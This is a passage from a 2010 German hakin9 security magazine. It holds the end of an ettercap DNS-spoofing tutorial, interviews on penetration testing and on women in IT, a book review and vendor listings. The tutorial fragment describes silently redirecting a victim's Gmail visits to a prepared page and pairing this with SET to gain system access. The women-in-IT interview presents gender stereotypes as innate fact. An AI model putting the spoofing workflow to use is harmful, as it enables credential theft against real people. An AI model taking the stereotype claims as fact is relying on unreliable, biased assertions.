Punkt dns_spof aus. 

Und somit ist unser DNS-Spoofing-Angriff einsatzfähig 

und aktiv. 

Wem als Angreifer kein GUI zur Verfügung steht, der 

kann auch den interaktiven Modus von ettercap verwenden. 

Dazu muss ettercap nur mit der Option -T aufgerufen 

werden. Alles weitere ist dann in der Hilfe (h- 

Taste) nachzulesen. 

Nun ist alles getan! Jedes mal wenn nun unser Opfer 

die Webseite von Gmail aufruft, wird es auf unsere 

präparierte Seite umgeleitet, ohne dass es davon etwas 

merkt. 

In Kombination mit SET erhält ein Angreifer so mühelos 

Zugriff auf ein fremdes System. 

Links 

�� http://seicon.ch Unternehmen des Autors 

�� http://blog.encodingit.ch� �� 

PATRICK SCHMID 

Der Autor ist System Engineer im Bereich Linux / Unix und 

unterstützt nebenbei die Entwicklung und Verbreitung von Linux 

und Opensource im privaten wie auch im professionellen 

Umfeld. 

hakin9.org/de 39

Interview mit Tobias Glemser 

„Sicherheit darf nicht erst am Ende von neuen 

Anwendungen, Produkten oder Projekten als 

Kontrollinstrument einbezogen, sondern muss 

als integraler und vor Allem unterstützender 

Bestandteil eines erfolgreichen Produkts 

gesehen werden.“ 

Interview mit Tobias Glemser 

hakin9: Erzählen Sie uns bitte ein wenig über sich 

selbst: wer sind Sie, was machen Sie und wie ist es 

dazu gekommen, dass Sie sich mit IT-Sicherheit 

Branche beschäftigen? 

Tobias Glemser: Mein Name ist Tobias Glemser, ich 

bin leitender IT-Sicherheitsberater bei der Tele-Consulting 

security networking training GmbH in Gäufelden bei 

Stuttgart und verantwortlich für den Geschäftsbereich 

Penetrationstests. Zu Schul- und Zivildienstzeiten hatte 

ich bereits den ersten Kontakt mit technischen Audits 

und habe schlicht das Hobby zum Beruf gemacht. Seit 

über zehn Jahren bin ich in entsprechenden Projekten 

tätig. Am Wichtigsten ist der kreative Umgang mit Systemen 

und Anwendungen. Funktionen, die ein Entwickler 

nach besten Wissen und Gewissen implementiert 

hat so zu nutzen, dass sie nicht mehr dem ursprünglichen 

Zweck dienen. Im Projektumfeld erhält man viele 

Einblicke in Techniken und Prozesse in unterschiedlichen 

Firmen und Behörden, z. B. Energie, Flugraumüberwachung, 

Banken. Neben den technischen Aspekten 

ist es mein und unser Ziel mit allen Beteiligten des 

Kunden ein gemeinsames Ziel zu erreichen. So wäre es 

aus meiner Sicht unsinnig, technische Schwachstellen 

mit rein technischen Hilfestellungen zu beheben. Der 

Ansatz springt deutlich zu kurz. Vielmehr geht es auch 

darum, auf Prozesse abzuleiten und diese zu verbessern. 

Diese Nachhaltigkeit und die positiven Rückmeldungen 

treiben an. Darüber hinaus bin ich frei in der 

Beratung, d. h. wir haben keine Produkte im Portfolio, 

die bei einem technischen Audit möglichst gleich mit angepriesen 

werden müssen. 

hakin9: Bereits bei mehreren tausend Tests 

von Netzen und Systemen haben Sie den 

selbstentwickelten Security Scanner tajanas genutzt. 

Was unterscheidet tajanas von anderen solchen 

Werkzeugen? 

Tobias Glemser: Wir haben tajanas zunächst für eigene 

Zwecke entwickelt und setzten es auch heute als 

Basis in Penetrationstests ein. tajanas ist ein Frame- 

work und Webfrontend für die grundsätzliche Prüfung 

eines Systems mit automatisierten Port- und Vulnerability-Scans 

und einheitlichem Reporting pro System. 

Wir haben dabei das Ziel verfolgt, nicht das Rad neu 

zu erfinden, sondern etablierte Programme für die eigentlichen 

Prüfungen zu nutzen. Die Ergebnisse der 

einzelnen Schritte werden analog zu einer manuellen 

Prüfung mit den jeweiligen Programmen automatisiert 

verknüpft. Dies ermöglicht eine wesentliche schnellere 

Durchführung bei gleicher Ergebnis-Qualität. Darüber 

hinaus ist die Oberfläche so gehalten, dass nur die notwendigsten 

Optionen zur Verfügung stehen. 

Neben der Schwachstellen-Prüfung ist auch eine 

Erreichbarkeitsprüfung integriert, um einen schnellen 

Überblick über aktive Systeme in Netzen zu erhalten. 

Es ist wichtig zu verstehen, dass Penetrationstests 

ohne automatisierte Tests nicht funktionieren. Die schiere 

Anzahl an Schwachstellen lässt sich nur sinnvoll mit 

entsprechenden Programmen prüfen. Die Ergebnisse 

sind dann die Basis für weitere, manuelle Tests. Dabei 

wird mit Know-How und Kreativität versucht, weitere 

Lücken zu finden, um und diese dann auszunutzen. 

hakin9: Wie erfolgt die Bedienung des Scanners, und 

welche Lizenzen und Module existieren? 

Tobias Glemser: Die Bedienung erfolgt vollständig 

über eine webbasierte Oberfläche. tajanas wird als VMware- 

oder Hardware-Appliance ausgeliefert, der Endbenutzer 

kann alle Funktionen – dazu gehören auch Aktualisierungen 

– über die Weboberfläche nutzen, Jeder 

Nutzer erhält natürlich trotzdem vollständigen Root-Zugriff 

auf das System. Die Lizenzierung erfolgt pro Installation, 

eine Limitierung auf IP-Adressen oder eine 

gewisse Anzahl Scans erfolgt nicht. Neben dem Audit- 

Modul, gibt es auch ein Modul für die Erreichbarkeitsprüfung. 

hakin9: Woher kommt der Name tajanas? 

Tobias Glemser: tajanas steht für „this ain’t just another 

network scanner” – weil es ein wie beschrieben ein 

hakin9.org/de 41

42 

Framework darstellt und nicht den n-ten Port- oder Vulnerability-Scanner. 

Wenn wir Bugs in den verwendeten 

Programmen feststellen oder Ideen für Erweiterungen 

haben, geben wir diese direkt in die Community zurück. 

hakin9: Wer sind Benutzer von tajanas? 

Tobias Glemser: Zum einen natürlich wir selbst. Zum 

anderen setzten IT-Sicherheitsbeauftragte und IT-Revisoren 

das Tool für regelmäßige Sicherheitsprüfungen 

ihrer Netze ein. 

hakin9: Für welche Fälle reichen Penetrationstests 

nicht aus? 

Tobias Glemser: Das hängt von der Zieldefinition des 

Kunden ab, und was man unter einem Penetrationstest 

versteht. Bei Tele-Consulting sind alle Mitarbeiter nicht 

nur in technische Audits wie Penetrationstests eingebunden, 

sondern auch in prozessorientierte Beratungen und 

Audits wie z. B. ISO 27001 oder BSI IT-Grundschutz. 

Dies ermöglicht es uns, in technischen Audits nicht nur 

die technischen Lücken aufzuzeigen, sondern auch auf 

fehlende oder mangelhafte Prozesse hinzuweisen und 

konkrete Vorschläge zur Verbesserung zu geben. 

hakin9: Können Sie uns ein konkretes Beispiel 

nennen? 

Tobias Glemser: Nehmen wir an, dass aus Wirtschaftlichkeitsgründen 

nicht alle Server in einem Netz in ein 

technisches Audit einbezogen werden, sondern nur eine 

definierte Anzahl. Stellt man hier Schwachstellen fest, 

so genügt es nicht, die erkannten Schwachstellen oder 

gar Lücken zu schließen, sondern man muss sich fragen, 

wie es zu den Schwachstellen kommen konnte. In 

den seltensten Fällen haben hier Administratoren individuelle 

Fehler gemacht, vielmehr scheinen offensichtlich 

die Vorgaben zur Serverkonfiguration bzw. Härtung 

nicht ausreichend zu sein bzw. diese in ein Information 

Security Management System (ISMS) integriert zu sein. 

Darauf weisen wir nachdrücklich in unseren Ergebnisberichten 

hin, um eine Gesamtverbesserung zu erzielen 

und unterstützen bei Bedarf auch bei der Umsetzung 

der organisatorischen Anteile. 

Geht man diesen Schritt nicht, werden erfahrungsgemäß 

nur die Systeme verändert, bei denen im Test 

Schwachstellen erkannt wurden. Der Verbesserung der 

Gesamtsicherheit hilft dies dann allerdings nicht. 

hakin9: Wie sieht eine Sicherheitsüberprüfung 

mithilfe des Penetrationstests aus? 

Tobias Glemser: Zunächst bedarf es einer klaren Zielvorstellung. 

Entweder haben Kunden diese bereits, 

oder sie wird im Rahmen eines Workshops gemeinsam 

erarbeitet. Dabei ist es meist sinnvoll mehrstufig vorzugehen 

und die Themen in verschiedenen Arbeitspaketen 

abzuarbeiten. Im Rahmen eines Kick-Offs werden 

die Beteiligten informiert und in den Ablauf integriert. 

INTERVIEW 

Nach der Durchführung erhält der Kunde einem umfassenden, 

auf seine Umgebung und Realität angepassten 

Ergebnisbericht, der im Rahmen eines Abschluss- 

Workshops mit den technischen verantwortlichen 

besprochen wird. Auf Wunsch erfolgt auch die Darstellung 

vor dem Vorstand bzw. der Leitungsebene. 

Das Spektrum eines Penetrationstests ist sehr vielfältig 

und lässt sich nur schwer darstellen. Es handelt 

sich dabei jedoch nicht zwingend um die „bekannten“ 

Prüfungen auf Serversysteme. Häufige Einfallstore für 

Angreifer sind schlecht gesicherte lokale Netzwerke, 

Client-Systeme oder auch Multifunktionsdrucker. Bei 

Interesse finden sich Informationen z. B. in der Studie 

Penetrationstests des BSI, dem Whitepaper Penetrationstests 

der Tele-Consulting oder auch dem Whitepaper 

Projektierung der Sicherheitsprüfung von Webanwendungen 

der OWASP. 

hakin9: Welche Pläne die IT-Sicherheit Branche 

betreffend haben Sie noch vor? 

Tobias Glemser: Abseits von technischen Audits versuchen 

wir ganzheitliche Prozesse vor allem, aber nicht 

nur in den IT-Abteilungen zu etablieren und dabei Administratoren 

die Hilfestellungen zu geben, die sie dabei 

benötigen. Als Sicherheitsberater oder auch Sicherheitsbeauftrager 

eines Unternehmens nimmt man meist 

die Rolle eines Kontrolleurs ein, der darauf achtet, dass 

Regeln eingehalten werden. Hier ist ein Wandel erforderlich, 

sowohl bei denen, die sich „Sicherheit“ auf die 

Fahnen schreiben, als auch bei den Administratoren 

und Verantwortlichen für Geschäftsbereiche und deren 

Technik. Sicherheit darf nicht erst am Ende von neuen 

Anwendungen, Produkten oder Projekten als Kontrollinstrument 

einbezogen, sondern muss als integraler und 

vor Allem unterstützender Bestandteil eines erfolgreichen 

Produkts gesehen werden. Hier müssen auch und 

vor allem Sicherheitsberater umdenken, um vorrangig 

als Unterstützer, die sie sind, gesehen und akzeptiert 

zu werden. Nur so begreifen die technisch verantwortlichen 

Mitarbeiter Sicherheitsprüfungen nicht als Prüfungen 

ihrer persönlichen Kompetenz, sondern als konkrete 

Unterstützung für die Verbesserung vorhandener 

Sicherheitsprozesse. 

Im Bereich der technischen Schwachstellen werden 

weiterhin Webanwendungen eine große Rolle spielen. 

Daher bin ich seit geraumer Zeit beim Open Web Application 

Security Project (OWASP), den meisten vermutlich 

durch die OWASP Top 10 bekannt, ehrenamtlich 

tätig und seit diesem Jahr im Board der deutschen Sektion. 

Beim OWASP Stammtisch Stuttgart (und Stammtischen 

in anderen Städten) tauschen sich hier auch 

Menschen rund um das Thema zwanglos aus. Wer 

Lust hat vorbeizukommen, kann sich auf der deutschen 

OWASP Webseite informieren. 

Wir bedanken uns für das Gespräch! 

10/2010

44 

INTERVIEW 

„Erfolgreiche Frauen 

in der IT-Branche - ein 

Erfahrungsbericht“ 

Interview mit Ulrike Peter 

hakin9: Lassen Sie uns bitte ein wenig über sich selbst 

wissen: wer sind Sie, was machen Sie und wie ist es 

dazu gekommen, dass Sie in der IT-Branche tätig sind? 

Ulrike Peter: Ich bin PR-Spezialistin und Journalistin 

durch und durch. Die Liebe zum Schreiben entdeckte 

ich früh. Nach ersten Gehversuchen als freie 

Mitarbeiterin bei einer Tageszeitung absolvierte ich 

vor zehn Jahren ein Volontariat in einer PR-Agentur 

mit parallelem Fernstudium „Journalismus“. Die ersten 

Tage in der Agentur waren wie ein Kopfsprung 

ins kalte Wasser. Denn obwohl ich das journalistische 

Rüstzeug besaß, wusste ich anfangs nicht mal, wo 

sich die Escape-Taste an meinem PC befand, hatte 

aber die Aufgabe, ohne spezielles Hintergrundwissen 

über komplexe Technologien detaillierte Berichte zu 

formulieren. Da dies den Ehrgeiz in mir weckte, arbeitete 

ich mich schnell in die Materie ein und stellte 

fest, dass Public Relations in Verbindung mit der 

Erstellung technologischer Texte mein Steckenpferd 

ist. Heute bin ich Geschäftsführerin meiner eigenen 

PR-Agentur und obwohl ich mittlerweile auch in weiteren 

Branchen und Aufgabengebieten zuhause bin, 

ist die Freude daran, „trockene“ und komplexe Inhalte 

lebendig werden zu lassen, noch genauso vorhanden 

wie am ersten Tag. 

hakin9: Viele glauben, dass Computer Männersache 

sind. Was halten Sie davon? 

Ulrike Peter: Die landläufige Meinung existiert nach 

wie vor, dass Männer ein besseres technologisches 

Verständnis mitbringen. Dies resultiert nicht selten 

aus Vorurteilen, lässt sich aber auch nicht komplett 

abstreiten. Denn nicht nur Erfahrungswerte, sondern 

auch Belege aus der Hirnforschung zeigen, dass 

Frauen besser mit Sprache umgehen können und 

Männer sich in Naturwissenschaften wohler fühlen. 

Es liegt wohl ein Stück weit in der Natur der Sache. 

Aber wie heißt es so schön: „Ausnahmen bestätigen 

die Regel“. Und der Trend zeigt beispielsweise, dass 

Frauen zunehmend technische Studiengänge belegen. 

hakin9: Heutzutage sind wir überall von Computern 

umgeben. In der IT-Branche herrscht trotzdem ein 

Frauenmangel. Woran liegt dies Ihrer Meinung nach? 

Ulrike Peter: Noch lockt es wesentlich mehr Männer in 

technische Berufe als Frauen. Ich denke, das Verhältnis 

wird auch in Zukunft so bleiben – auch wenn sich die 

klassische Rollenverteilung verschiebt und die „Gren- 

10/2010

zen“ in beide Richtungen mehr und mehr verschwimmen. 

Denn auch Männer finden wir heute in Berufen, 

die vor Jahren ausschließlich Frauen zugeordnet wurden. 

Und wir sind zwar von elektronischen Geräten wie 

PCs, Smartphones etc. umgeben und diese werden 

auch rege von beiden Geschlechtern genutzt – aber einen 

technischen Job zu ergreifen ist ein anderes paar 

Schuhe. Hierzu gehört ein besonderes Faible. Die Beweggründe, 

weshalb in diesem Segment Frauenmangel 

herrscht, sind meiner Meinung nach: Ihnen fehlt 

manchmal der Mut, sie erhalten nicht immer die gleichen 

Chancen oder – und das wird der Hauptgrund sein 

– es liegen schlichtweg die Interessen in anderen Bereichen. 

hakin9: Woraus resultieren die Vorurteile gegen die 

Frauen, die sich mit Computern beschäftigen? 

Ulrike Peter: Die IT ist (und bleibt es sicher auch) eine 

Männerdomäne – Frauen in der IT-Branche sind Paradiesvögel. 

Wie in allen Berufen, in denen seit jeher ein 

Geschlecht etabliert ist, sich Prozesse eingeschliffen 

und bewährt haben, ist es erst einmal fremd und gewöhnungsbedürftig, 

wenn sie sich verändern. So liegen 

die Vorurteile zum einen daran, dass es nicht üblich ist, 

wenn Frauen in diesen Berufen arbeiten und Männern 

die „Technik“ zugeordnet wird – zum anderen resultieren 

sie daraus, dass die unterschiedlichen Fähigkeiten 

und Interessen der Geschlechter einfach naturgegeben 

sind. So wie kleine Jungen mit Autos spielen und 

Mädchen mit Puppen, stecken auch später gewisse 

Verhaltensweisen und Interessen in uns, die bereits in 

der Kindheit geprägt werden. Greift das weibliche Geschlecht 

im Berufsleben plötzlich zum „Auto“, so ist dies 

ungewöhnlich und wird erst einmal hinterfragt. 

hakin9: Wie sieht die Situation von Frauen in der IT- 

Branche aus? Ist es leicht, als begabte IT-Expertin 

einen Job in einem Unternehmen zu bekommen? 

Ulrike Peter: Frauen in der IT-Branche sind häufig in 

Marketingabteilungen zu finden – aber zum Beispiel 

auch bei der schreibenden Zunft in Fachverlagen. In 

diesen Jobs herrscht in meinen Augen Chancengleichheit. 

Als IT-Expertin in einem technischen Beruf wie Administrator, 

Entwickler oder Ähnliches sieht es dagegen 

anders aus. In diesem Segment haben es weibliche 

Fachkräfte meiner Ansicht nach schwerer. Die Hürde, 

zum Bewerbungsgespräch eingeladen zu werden, ist 

höher. Bekommt sie die Chance dazu, wird vielleicht etwas 

genauer hingeschaut, aber letztlich zählt die Kompetenz, 

die unterm Strich den entscheidenden Ausschlag 

geben wird. 

hakin9: Wie werden Frauen von Männern als ihre 

Mitarbeiter wahrgenommen? 

Ulrike Peter: Dies lässt sich nicht pauschalisieren 

und richtet sich zum einen nach der Einstellung des 

Interview mit Ulrike Peter 

Vorgesetzten und zum anderen nach den Fähigkeiten 

der Frau. Jeder Mitarbeiter, der neu eingestellt wird, 

steht vor der Aufgabe, sich zu beweisen – und sollte 

die Möglichkeit dazu erhalten. Jedoch werden Frauen 

in typischen Männerberufen oft kritischer beäugt 

und stehen länger auf dem Prüfstand. Dies passiert 

teils unbewusst. Auch beweisen Studien immer wieder, 

dass männliche Arbeitnehmer im gleichen Job 

mehr verdienen als weibliche. Hier macht die Gesellschaft 

aber eine Entwicklung durch und dies reguliert 

sich sicherlich zumindest ein Stück weit im Laufe der 

nächsten Jahre. 

hakin9: Was macht Ihnen am meisten Spaß bei der 

Arbeit in der IT-Branche? 

Ulrike Peter: Bevor ich mich selbständig machte, war 

ich bereits in einem anderen Unternehmen in der Geschäftsleitung 

tätig – jedoch konnte ich den Stift zum 

Schreiben nie aus der Hand legen. Es reizt mich, immer 

wieder neue technologische Themen zu erkunden 

und dabei nicht nur an der Oberfläche zu kratzen, sondern 

Detailtiefe zu erlangen, um fundiert und lesenswert 

über ein Thema berichten zu können. Im Laufe 

der Jahre habe ich eine starke Affinität zur IT-Security 

entwickelt. Ich finde es spannend, über Sicherheitslücken, 

Verschlüsselungstechniken und vieles weitere 

zu schreiben. Darüber hinaus macht es mir großen 

Spaß, IT-Unternehmen durch die richtige PR-Strategie 

nach vorn zu bringen und entsprechende Maßnahmen 

in die Tat umsetzen. Beim Kennenlernen eines potenziellen 

Neukunden im ersten Moment manchmal hinsichtlich 

der technischen Fachkompetenz unterschätzt 

zu werden und dann schnell durch Know-how zu überzeugen, 

bestätigt mich immer wieder in dem, was ich 

tue. 

hakin9: Was sollte unternommen werden, um 

die Ressentiments von Frauen gegenüber IT-Jobs 

abzubauen? 

Ulrike Peter: Ich glaube, dem kann man bzw. Frau nur 

entgegenwirken, indem sie den Mut hat, ihre Interessen 

zu verfolgen und sie unter Beweis zu stellen. Aus Erfahrung: 

wenn jemand seine Fähigkeiten zeigt und engagiert 

an eine Sache herangeht, rückt das Geschlecht 

automatisch in den Hintergrund. 

Wir bedanken uns für das Gespräch! 

hakin9.org/de 45

46 

SAP for DFPS 

Implementierung 

und Customizing 

Galileo Press, Bonn 2010 

1. Auflage 2010 

Autoren: 

Bernhard Escherich 

Heinrich Pfriemer 

Wolfgang Ullwer 

Das Buch SAP for DFPS Implementierung und 

Customizing, basiert auf mehr als 20 Jahren Erfahrung 

die die Autoren insgesamt bei der Entwicklung, 

Implementierung, aber auch Schulung der 

Lösung sammeln konnten. 

Die über 650 Seiten vollgepacktes Wissen sollten sie 

nicht abschrecken dieses Buch in die Hand zu nehmen. 

Es ist sehr gut und flüssig geschrieben. Man schafft es, 

sollten sie ein schneller LeserIn sein in zwei Tagen. 

Sie benötigen keine tiefgreifenden SAP-Kenntnisse 

zum Verständnis, daher ist es für Entscheider genauso 

geeignet wie für Projektleiter, Architekten, funktionale 

Mitarbeiter, Basismitarbeiter oder externe Berater. 

Komplexe Zusammenhänge werden sehr schön und 

bildhaft beschrieben, damit auch für den SAP-Laien, 

das Vorgehen verständlich beschrieben wird. Erwähnenswert 

finde ich in diesem Zusammenhang Rubiks 

Zauberwürfel. 

Das Buch ist sehr strukturiert aufgebaut und 

umfasst unverzichtbare Grundlagen in den Teilen I-III. 

Für Experten wird es dann in Teil IV richtig spannend 

und interessant. 

Die von SAP entwickelte fast eierlegende Wollmilchsau, 

erfordert ein umfangreiches Nachschlagewerk, zur 

Implementierung. Den Autoren ist dies hiermit gelungen. 

Ihnen ist es außerdem gelungen aufzuzeigen, wie 

komplexe „Unternehmensstrukturen“ bewältigt und Kosten 

reduziert und kontrolliert werden können. 

Das Beispielprojekt „Tsunami“ verdeutlicht dabei an 

einem nicht so komplexen Projekt die Anforderungen. 

Beleuchtet wird z.B. wie militärische Kernprozesse, wie 

etwa die Logistik substanzielle Einsparungen von ca. 

30% erzielen könnten, als auch die Unterstützung von 

Einsätzen verbessert werden könnten (Beschleunigung 

der Verlegung um bis zu 50 -70%). 

Des Weiteren wird die Interoperabilität sehr schön heraus 

gestellt und die integrativen Aspekte stets im Blick 

behalten. 

REZENSIONEN 

Hervorheben sollte man die organisatorische Flexibilität 

und Logistik wie das Logistic Assessment, Prozessmanagement, 

Qualification Management inkl. der 

Übernahme von Trainingsdaten, das Managementkonzept 

BSC (Balanced Scorcard), die Einsatzmöglichkeiten 

von mobilen Anwendungen für Schutzaufgaben, 

SOA und NCW bzw. NetFüOp mit DFPS. 

Der Mehrwert wird z.B. am Meldewesen der NC3A 

durch Automatisierung von weiten Teilen, schön heraus 

gearbeitet. 

Die ausführlichen bebilderten Beispiele, stellen eine 

gelungene Verbindung zwischen Theorie und Praxis 

bzw. Anwendung dar. In der SAP-typischen Struktur 

wurden die neuen und bereits erwähnten Funktionen 

sinnvoll und gekonnt integriert. 

Des Weiteren findet sich für die richtige IT-Architektur 

ein schön gefüllter Werkzeugkasten mit den dazugehörigen 

Do’s and Dont’s. Natürlich darf auch das best 

practices nicht fehlen, sowie der Ausblick auf zukünftige 

Entwicklungen. 

Egal ob sie sich für eine Neuintegration oder eine Core2Defense 

Lösung entscheiden, 

die Kapitel zu den Themen: 

�� 

�� 

�� 

�� 

möchte ich ihnen unbedingt ans Herz legen. 

FAZIT: 

Dieses Buch sollte keinem Entscheider und IT-Verantwortlichen 

vorenthalten werden. 

Prädikat besonders empfehlenswert. 

Autor: Nicole Huck 

10/2010

Datenschutz ist EU-weit gesetzliche Anforderung. 

Wir sorgen für die Erfüllung rechtlicher 

Vorschriften und kümmern uns um ein angemessenes 

Datenschutzniveau in Ihrem Unternehmen, 

auch international. 

www.blossey-partner.de 

Securitymanager.de ist eine Produktion des 

Online-Verlag FEiG & PARTNER. Seit dem 

Start hat sich Securitymanager.de zu einem 

führenden Online-Informationsportal in 

Deutschland entwickelt und versteht sich als 

unabhängiger Informationsdienstleister der 

IT- und Information-Security-Branche. 

www.securitymanager.de 

Pericom base camp IT-Security: Unser Ziel ist 

es, unsere Kunden vor möglichen Gefahren 

für Ihre IT-Infrastruktur bestmöglich zu schützen. 

Neben der Analyse von Risikopotentialen 

durch Security Audits bieten wir, durch 

die Implementierung von Security-Lösungen, 

Schutz vor konkreten Gefahren. 

www.pericom.at 

Recommended Sites 

Die Netzwerktechnik steht auf www.easy-network.de 

im Mittelpunkt. Artikel, Tutorials und 

ein Forum bieten genügen Stoff für kommende 

�� 

www.easy-network.de 

Happy-Security ist ein neues Portal mit Security-Challanges, 

IT-Quiz, Web-Bibliothek, Multimedia-Center 

& vielen weiteren Features. 

www.happy-security.de 

CloudSafe stellt seinen Nutzern eine Plattform 

zur kryptographisch sicheren Ablage und Verwaltung 

von sensiblen Daten zur Verfügung: Nutzer 

können auf CloudSafe beliebig viele Dokumente 

in virtuellen Safes ablegen. Es können weiteren 

Personen individuelle Zugriffsrechte auf die 

Safes eingeräumt und somit ein sicherer Datenaustausch 

ermöglicht werden. 

www.cloudsafe.com 

Die Seed Forensics GmbH bietet für Strafverfolgungsbehörden 

professionelle Unterstützung 

in den Bereichen der Datensicherstellung und 

Datenträgerauswertung. Selbstverständlich 

entsprechen unsere Mitarbeiter, unser technisches 

Equipment und auch unsere Räumlichkeiten 

den notwendigen Anforderungen. 

www.seed-forensics.de 

�� 

Computerfreaks höher schlagen lässt: Geek 

Wear mit intelligenten Sprüchen, eine riesige 

Auswahl Gadgets und natürlich auch viele 

Hacker Tools. 

www.getDigital.de 

AV-Comparatives geht hervor aus dem Innsbrucker 

Kompetenzzentrum und gilt als eines 

der bekanntesten unabhängigen Testhäuser 

für Antiviren-Software. 

www.av-comparatives.org 

Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org

SEC Consult 

Recommended Companies 

Mabunta 

�� 

spezialisierter und kompetenter Partner 

�� 

�� 

heitsfragen in allen Unternehmensbereichen, 

verbinden Wachstum mit 

sicherer Kommunikation. 

Alles in allem- mabunta „one-face-tothe-customer“, 

Ihr Spezialist in Fragen 

�� 

www.mabunta.de 

SEC Consult 

SEC Consult ist der führende Berater 

für Information Security Consulting in 

Zentraleuropa. Die vollständige Unabhängigkeit 

von SW- und HW-Herstellern 

macht uns zum echten Advisor unserer 

Kunden. Unsere Dienstleistungen umfassen 

externe/interne Sicherheitsaudits, 

(Web-) Applikationssicherheit (ONR 17- 

700), Sicherheitsmanagement-Prozesse 

(ISO 27001) etc. 

www.sec-consult.com 

Tele-Consulting GmbH 

�� 

Sicherheit, hakin9 und c’t Autoren, jahrelange 

Erfahrung bei der Durchführung 

von Penetrationstests und Security-Audits, 

eigener Security Scanner „tajanas”, 

Sicherheitskonzepte, Risikoanalysen, 

�� 

ISO 27001-Auditoren, VoIP-Planung 

und -Security 

www.tele-consulting.com 

secXtreme GmbH 

schützt Ihre Web-Anwendungen bis 

auf Applikationsebene. Dazu gehört 

sowohl die Prüfung von Applikationen 

(Pentests und Code-Reviews) als auch 

Beratungsleistungen für Sicherheit im 

Entwicklungsprozess und Schutzlösungen 

(Web Application Firewalls) bei 

�� 

Mittelstand. 

www.sec-Xtreme.com 

B1 Systems 

Die B1 Systems ist international tätig 

in den Bereichen Linux/Open Source 

�� B1 

Systems spezialisiert sich in den Bereichen 

Virtualisierung und Cluster. 

info@b1-systems.de 

www.b1-systems.de 

Blossey & Partner 

Consulting Datenschutzbüro 

Datenschutz ist EU-weit gesetzliche Anforderung. 

Wir sorgen für die Erfüllung 

rechtlicher Vorschriften und kümmern 

uns um ein angemessenes Datenschutzniveau 

in Ihrem Unternehmen, 

auch international. Wir erledigen alle erforderlichen 

Aufgaben, die Fäden behalten 

Sie in der Hand. Nutzen Sie unser 

Erstberatungsgespräch. 

www.blossey-partner.de

Recommended Companies 

NESEC 

NESEC ist Ihr Spezialist für Penetrationstests, 

Sicherheitsanalysen und 

�� 

�� 

cherheitsprüfungen Ihrer Netzwerke 

und Webapplikationen sowie bei Source 

Code Audits. Bei Bedarf optimieren 

wir Ihre Policy, sensibilisieren Ihre 

�� 

nehmen nach ISO 27001. 

www.nesec.de 

Seed Forensics GmbH 

�� 

für Strafverfolgungsbehörden professionelle 

Unterstützung in den 

Bereichen der Datensicherstellung 

und Datenträgerauswertung. Selbstverständlich 

entsprechen unsere 

Mitarbeiter, unser technisches Equip- 

0ment und auch unsere Räumlichkeiten 

den notwendigen Anforderungen. 

www.seed-forensics.de 

Protea Networks 

�� 

Lösungen: Verschlüsselung, Firewall/ 

�� 

ring, etc. Wir bieten umfassende Beratung, 

Vertrieb von Security-Hard- und 

Software, Installation und umfangreiche 

�� 

nings). Protea setzt auf Lösungen der 

�� 

dafür direkten inhouse-Support bereit. 

www.proteanetworks.de 

SecureNet GmbH, München 

Als Softwarehaus und Web Application 

Security Spezialist bieten wir Expertise 

rund um die Sicherheit von Webanwendungen: 

Anwendungs-Pentests, Sour- 

�� 

delines, Beratung rund um den Software 

�� 

Firewalls, Application Scanner, Fortify 

�� 

www.securenet.de 

m-privacy GmbH 

�� 

einfach zu bedienen! 

So präsentieren sich die von m-privacy 

�� 

�� 

tesiegel. Es bietet als erstes System 

weltweit einen kompletten Schutz vor 

Online-Spionage, Online-Razzien und 

gezielten Angriffen! 

www.m-privacy.de 

OPTIMAbit GmbH 

Wir sind Spezialisten für Entwicklung 

�� 

und Mobile Applikationen gegen Angriffe 

externer und interner Art. Unsere Dienste 

umfassen Audits, Code Reviews, 

Penetrationstest, sowie die Erstellung 

von Policies. Zusätzlich bieten wir Semi- 

�� 

www.optimabit.com 

secadm 

secadm ist durchtrainierter Spezialist für 

Airbags, ABS und Sicherheitsgurte in der 

�� 

Mannjahren Erfahrung beraten, entwi- 

�� 

für Kunden weltweit. Der Fokus liegt da- 

�� 

und Security-Management. Risiko-Analyse, 

die Sicherheitsberatung, Auditing, Security-Leitfäden, 

Software-Entwicklung, 

�� 

www.secadm.de 

underground_8 

secure computing gmbh 

Wir entwickeln und vertreiben securi- 

�� 

�� 

und Antispam. Unsere Lösungen sind 

hardwarebasiert und werden über Distributoren, 

Reseller und Systemintegratoren 

implementiert und vertrieben. 

www.underground8.com

Magazin als PDF - Bites, Bytes and my 5 cents - portfolio

Erfolgreiche ePaper selbst erstellen

Template löschen?

Als Template speichern?